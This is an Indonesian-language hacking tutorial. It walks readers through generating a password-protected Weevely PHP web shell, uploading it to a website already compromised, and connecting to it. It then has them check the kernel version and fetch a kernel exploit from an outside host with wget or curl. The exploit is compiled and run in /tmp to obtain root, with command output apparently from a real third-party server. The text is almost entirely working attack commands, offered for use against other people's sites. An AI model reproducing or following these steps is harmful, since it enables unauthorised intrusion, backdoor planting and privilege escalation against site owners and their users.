bahan-bahan:
-kopi
-otak
-internet
-python (jika belum ada disini)
-weevely ( disini )
oke langsung aja turorialnya:
ketik : cd\weevely ( di sesuaikan aja )
Setelah itu siapkan file berformat php dan ksongkan saja kalau saya april.php
lalu jalan kan perintah :
C:\weevely>main.py -g -o april.php -p frishella.com
Nah jika keluar tulisan seperti di atas tandanya kalian sukses
nah setelah itu kalian upload file tadi ke website yang sudah kalian tanamkan backdoor
setelah itu kalian berikan perintah di cmd
main.py -t -u www.target.com/april.php -p frishella.com (password yang kalian buat)
oke setelah itu kalian terhubung terhadap servernya (backconnect)
berhubung website yang saya tanam tidak bisa di rooting karena masalah kernelnya makanya saya akan beri penjelasan melalui teks saja tidak ada foto
lalu kalian cek versi kernelnya dengan perintah uname -a
akan muncul versi kernelnya
[miedcom@snowleopard.ip-asia.com /home/miedcom/public_html] uname -aLinux snowleopard.ip-asia.com 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64 #1 SMP ThuDec 18 06:49:17 EST 2014 x86_64 x86_64 x86_64 GNU/Linuxoke setelah itu muncul versi kernelnya 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64 #1 SMP Thu
Dec 18 06:49:17 EST 2014 (di sesuaikan dengan punya anda)
setelah itu kalian bisa cari di exploit db atau bisa di google
oke setelah kalian sudah punya kernelnya kalian berikan perintah
wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name
Contoh: www.exploit.com/2.6.18.c -o frishella.comsetelah gitu kalian ketik perintah
[miedcom@snowleopard.ip-asia.com /home/miedcom/public_html]cd ..
[miedcom@snowleopard.ip-asia.com /home/miedcom]cd tmp
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]
setelah gtu ketik ls
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]ls
akan muncul :
file
file1
anything
setelah itu kalian ketik perintah kembali :
wget www.exploit.com/2.6.18.c
setelah itu ketik lagi
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]gcc 2.6.18.c -o frishella.com (sesuaikan)
berikan perintah kembali :
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]ls
akan keluar
2.6.18.c
file
file1
anything
frishella.com
lalu berikan perintah
chmod 777 frishella.com
jika sudah selesai ketik perintah
./frishella.com
.
.
.
.
.
done!
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]id
uid=(root) gid=(root)